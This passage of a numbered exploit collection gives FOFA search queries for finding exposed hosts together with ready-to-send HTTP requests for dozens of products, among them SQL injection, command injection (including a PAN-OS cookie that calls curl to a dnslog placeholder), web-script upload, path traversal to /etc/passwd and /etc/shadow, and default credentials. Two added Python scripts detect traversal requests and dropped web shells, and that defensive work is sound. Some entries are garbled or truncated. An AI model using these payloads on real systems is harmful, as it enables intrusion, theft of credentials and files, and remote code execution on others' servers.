Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

# J0 q7 f% E2 W. k9 C+ \143. Netis WF2780 v2.1.40144 远程命令执行4 l( b4 S& T0 \' c6 _
CVE-2024-25850
$ c# i3 p3 N2 e" X/ oFOFA:title='AP setup' && header='netis'8 ^. l% |" K9 s- @2 n
PAYLOAD8 H; ?# }- S6 m; x0 d# z2 R

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

The mdc parameter carries a URL-encoded shell command. The request below writes a marker file under /var and reads it back (decoded: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;):

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Verify: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote in contenthistid provokes a database error; the time-based form of the same payload is entry 187.

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Verify:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Note that the slashes are percent-encoded: a filter or log search that looks for a literal ../ in the raw request line never sees this request.
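
Reviewing access logs for the traversal entries on this page (160 above, and 172, 173, 174, 178, 179 and 190 below) requires decoding before matching, since the Nexus request contains no literal ../ until %2F is decoded, and two of the PoCs carry the traversal in the POST body rather than the request line. The following Python is an added example, not code from the original post or from any of the vendors: it percent-decodes repeatedly, folds backslashes, and then applies a small set of heuristics. The request records are constructed from the PoCs on this page plus one double-encoded case that goes beyond them; the list of sensitive file names is an assumption for illustration.

```python
import re
from urllib.parse import unquote

# Heuristics: a dot-dot segment followed by a separator (after decoding and folding
# backslashes), a file:// scheme, and the files the PoCs on this page go after.
DOTDOT_RE = re.compile(r"\.\.(?:/|$)")
FILE_SCHEME_RE = re.compile(r"\bfile:/{2,3}", re.IGNORECASE)
SENSITIVE = ("etc/passwd", "etc/shadow", "web.config", "web.xml",
             "log4net.config", "jhfileconfig.ini")   # assumed watch list


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), then fold '\\' to '/'."""
    cur = value
    for _ in range(rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.replace("\\", "/")


def triage(target: str, body: str = "") -> list:
    """Return finding tags for one request; an empty list means nothing matched."""
    findings = []
    for where, raw in (("target", target), ("body", body)):
        if not raw:
            continue
        norm = normalize(raw)
        if DOTDOT_RE.search(norm):
            findings.append(f"dotdot:{where}")
        if FILE_SCHEME_RE.search(norm):
            findings.append(f"file-scheme:{where}")
        low = norm.lower()
        for name in SENSITIVE:
            if name in low:
                findings.append(f"sensitive:{name}")
    return findings


# Constructed request records (label, method, target, body) taken from the PoCs on this
# page, plus a benign request and a double-encoded variant that is not on the page.
SAMPLE_REQUESTS = [
    ("160 nexus", "GET", "/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd", ""),
    ("172 dt-camera", "GET", "/../../../../etc/passwd", ""),
    ("173 checkpoint", "POST", "/clients/MyCRL", "aCSHELL/../../../../../../../etc/shadow"),
    ("174 jinher", "GET", "/c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini", ""),
    ("178 h3c", "POST", "/imc/primepush/%2e%2e/flexFileUpload", ""),
    ("179 jianwen", "POST", "/Common/DownLoad2.aspx", "path=../log4net.config&Name="),
    ("190 poihuoqu", "POST", "/index.php/admin/Userinfo/poihuoqu", "poi=file:///etc/passwd"),
    ("double-encoded", "GET", "/files/%252e%252e%252f%252e%252e%252fetc/passwd", ""),
    ("benign", "GET", "/static/js/app.js?v=1.2.3", ""),
]


def run_samples() -> dict:
    """Map each sample label to its findings."""
    return {label: triage(target, body) for label, _method, target, body in SAMPLE_REQUESTS}


if __name__ == "__main__":
    for label, findings in run_samples().items():
        print(f"{label:16} {findings or '-'}")
```

The bounded decode loop matters: one round catches the Nexus request, a second round catches %252e-style double encoding, and stopping when the value no longer changes avoids looping on garbage. Feed it both the request line and, where a proxy or WAF logs them, the POST bodies, or the Check Point and 建文 cases go unseen.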

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the file name (here with a traversal prefix) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Verify: http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Verify: http://x.x.x.x/opt/resources/kjuhitjgk.aspx (the remotePath field chooses the destination directory)

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Verify: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx (the server stores the upload as update.aspx regardless of the submitted filename; the page deletes itself after the first request)
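
The upload PoCs above (155, 157, 159, 161, 162, 163, 164) all leave a server-side script in a web-served upload directory, and several of the dropped files delete themselves after one hit, so a request-side check can miss them while a later, quieter upload does not. A host-side sweep of the upload roots is the complementary check. The Python below is an added example, not the vendors' code: it builds a constructed directory tree mirroring the paths shown in entries 155, 157, 162 and 164 (plus one double-extension file that goes beyond them) and flags files by executable extension and by the script markers visible in those payloads. The extension and marker lists are assumptions chosen for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a web server may execute; any of them anywhere in the name is suspicious,
# which also catches shell.php.png style double extensions.
SERVER_SIDE_EXT = {".php", ".php3", ".php5", ".phtml", ".jsp", ".jspx",
                   ".asp", ".aspx", ".asmx", ".ashx", ".cfm"}

# Content markers lifted from the payloads on this page.
MARKERS = {
    "php-open-tag": re.compile(rb"<\?php"),
    "asp-open-tag": re.compile(rb"<%[@=!]?"),
    "self-delete": re.compile(rb"unlink\(__FILE__\)|File\.Delete\(Request\.PhysicalPath\)"),
    "exec-call": re.compile(rb"\b(?:system|phpinfo|passthru|shell_exec)\s*\("),
    "response-write": re.compile(rb"Response\.Write", re.IGNORECASE),
}


def inspect_file(path: Path) -> list:
    """Return reason tags for one file (empty if it looks benign)."""
    reasons = []
    bad_ext = {s.lower() for s in path.suffixes} & SERVER_SIDE_EXT
    if bad_ext:
        reasons.append("ext:" + ",".join(sorted(bad_ext)))
    head = path.read_bytes()[:65536]            # dropped scripts are small; the head suffices
    for name, rx in MARKERS.items():
        if rx.search(head):
            reasons.append("marker:" + name)
    return reasons


def sweep(root: Path) -> dict:
    """Walk an upload root and map relative path -> reasons for every flagged file."""
    flagged = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        reasons = inspect_file(path)
        if reasons:
            flagged[path.relative_to(root).as_posix()] = reasons
    return flagged


# Constructed fixture: paths and bodies mirror entries 155, 157, 162 and 164 on this page,
# plus a benign image and a double-extension file that is not on the page.
FIXTURE = {
    "files/upload/img_664ab7fd14d2c.php": b"<?php phpinfo();unlink(__FILE__);?>",
    "userfile/default/userlogo/kjldycpvjrm.jsp": b"nyhelxrutzwhrsvsrafb",
    "opt/resources/kjuhitjgk.aspx": b'<% response.write("ujidwqfuuqjalgkvrpqy") %>',
    "Upload/Publish/000000/0_0_0_0/update.aspx":
        b'<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");'
        b'System.IO.File.Delete(Request.PhysicalPath);%>',
    "files/upload/avatar.php.png": b"<?php echo 1; ?>",
    "files/upload/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
}


def build_fixture(root: Path) -> None:
    """Write the constructed files under root."""
    for rel, body in FIXTURE.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)


def sweep_demo() -> dict:
    """Build the fixture in a temporary directory, sweep it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_fixture(root)
        return sweep(root)


if __name__ == "__main__":
    for rel, reasons in sweep_demo().items():
        print(rel, "->", ", ".join(reasons))
```

Run `sweep(Path("/var/www/files/upload"))` style calls against the real upload roots named in the entries above; the marker-only hits (a .png that opens with `<?php`) are the ones an extension allowlist on upload would have missed, and the extension-only hit (the .jsp with a random body from entry 157) is the probe an attacker left behind to test whether the upload works.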
165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
(The URL is truncated in the source; the injection point is the sortOrder parameter.)

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: x.x.x.x
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Decoded, solutionNo is ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- ; on an injectable MSSQL backend the conversion error in the response contains the string "hello".

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR (HJSOFT HCM) OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

The /templates/attestation/../../ prefix is how the PoC reaches the handler; a filter that matches on the raw path must collapse the dot segments first, or it will not see /selfservice/lawbase/downlawbase.

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD licence-plate recognition camera) arbitrary file read
